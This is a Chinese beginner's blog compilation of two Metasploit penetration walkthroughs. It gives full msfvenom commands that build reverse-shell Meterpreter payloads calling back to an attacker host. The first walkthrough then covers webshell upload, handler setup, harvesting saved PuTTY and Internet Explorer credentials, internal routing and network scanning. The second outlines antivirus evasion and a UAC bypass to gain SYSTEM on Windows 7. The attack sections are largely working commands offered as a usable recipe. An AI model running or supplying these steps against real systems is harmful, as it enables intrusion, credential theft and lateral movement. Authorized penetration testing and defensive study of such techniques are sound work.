SOCSEC

Metasploit完整渗透案例

本人新手一枚,看大神们各种秀神器Metasploit的使用,各种666的玩法,心里那是个羡慕。但是自己有不会玩,只能先整理大神们的玩法。诚心学习,不喜勿扰。

案例 1

from http://zone.wooyun.org/content/25254

思路: 上传漏洞—-> 上传shell —-> 反弹木马 —-> 内网渗透
过程:
在http:xxxx.xxx.xx.xxx发现任意文件上传漏洞,果断上传webshell
首先用Metasploit生成反弹马,也就是生成反弹的payload:

(1)Payload生成

§ 生成win下的exe

1
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5566 -f exe x> /home/niexinming/back.exe

【注】:详细用法请查看本站”Metasploit命令详解”

§ 生成win下的aspx

1
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx

【注】:其他生成payload的方法请查看本站”Metasploit生成payload的方法总汇”

(2)渗透过程

§ 上传生成的aspx的反弹马

§ 启动msfconsole,本地监听反弹后的控制端:
use exploit/multi/handler

§ 本地监听确定使用哪个payload:
set payload windows/meterpreter/reverse_tcp

§ 设置本地监听的端口和地址:
set lport 7788
set lhost 0.0.0.0

§ 运行:
run

§ 访问生成的反弹马:
http://xxx.xxx.xx.xxx:/back.aspx
得到meterpreter的shell
图1

§ 使用meterpreter查看路由表:
run get_local_subnets

§ 使用meterpreter 寻找putty保存的信息:
run enum_putty

§ 使用meterpreter 寻找ie保存的密码:
run post/windows/gather/enum_ie

§ 使用meterpreter运行cmd:
shell
退出cmd shell 为:ctrl+c
图2

§ 把meterpreter放入后台:
background

§ 添加路由(这样才能进行内网的扫描):
route add 192.168.0.0 255.255.255.0 1
route add 的第一个参数是地址,第二个参数地址是掩码,第三个参数是sessis的id
图3

§ 进行内网的主机扫描:利用smb进行主机识别:
use auxiliary/scanner/smb/smb_version
先看看这个模块需要哪些参数 :
show options
图4
设置rhost:
set rhost 192.168.0.0/24
设置线程:
set threads 50
run
得到结果:
图5

§ 扫描端口:
use auxiliary/scanner/portscan/tcp
设置扫描范围:
set rhosts 192.168.0.0/24
设置扫描的端口:
set ports 22,23,21,3389,1433,80,8080,81,82
设置线程:
set threads 50
运行:
run
运行结果:

1
2
3
4
5
6
7
8
9
10
[*] 192.168.0.7:23** § **TCP OPEN
[*] 192.168.0.7:80** § **TCP OPEN
[*] 192.168.0.18:3389** § **TCP OPEN
[*] Scanned 30 of 256 hosts (11% complete)
........
[*] Scanned 236 of 256 hosts (92% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

§ 在局域网里面寻找匿名ftp:
use auxiliary/scanner/ftp/anonymous
设置ip段:
set rhosts 192.168.0.0/24
设置线程:
set threads 50
运行结果:
图6

到这里该案例就结束了,

案例2

from : http://zone.wooyun.org/content/12324

Metasploit+NAT环境+bypassUAC内存注入绕过+win7提权

思路
1.使用辅助模块auxiliary/pro/generate_dynamic_stager来创建可执行文件和绕开杀毒
2.使用bypassuac内存注入技术来提升你的目标上的特权
3.在NAT环境执行

测试网络拓扑:
图1

§ 攻击过程:
攻击者的那个ip是74.222.220.166端口是 4444,内网NAT映射的 IP是 10.2.0.125
1.打开msfconsole
2.调用动态生成模块auxiliary/pro/generate_dynamic_stager,并设置相关参数如下 :
图2
3.注意选择攻击平台,由于被攻击对象为64 win7,我们这里选择x86_64,exploit执行来生产利用程序如下图。
图3
4.上传目标主机
图4
5.Metasploit pro 主机调用载荷监听模块multi/handler
图5
6.设置payload为tcp 反链(注意为64位meterpreter)
图6
7.执行监听获取meterpreter
图7
8.现在已经获取一个session,我们先把session后台运行,接下来我们执行bypassuac攻击
图8
9.搜索metasploitfor bypassuac 利用模块
图9
10.利用bypassuac注入模块,进行exploit
图10
11.现在执行,可成功绕过win7 UAC获取系统权限
图11
12.getsystem 获取系统权限
图12
13.获取cmd
图13

个人总结:

经过这两个例子,可以大致总结下Metasploit的通常用法:

 

§ 其他内网技巧请查看本站”Metasploit 内网模块总结

注:本人小菜,初学渗透。总结的不好的地方,请大神指正!!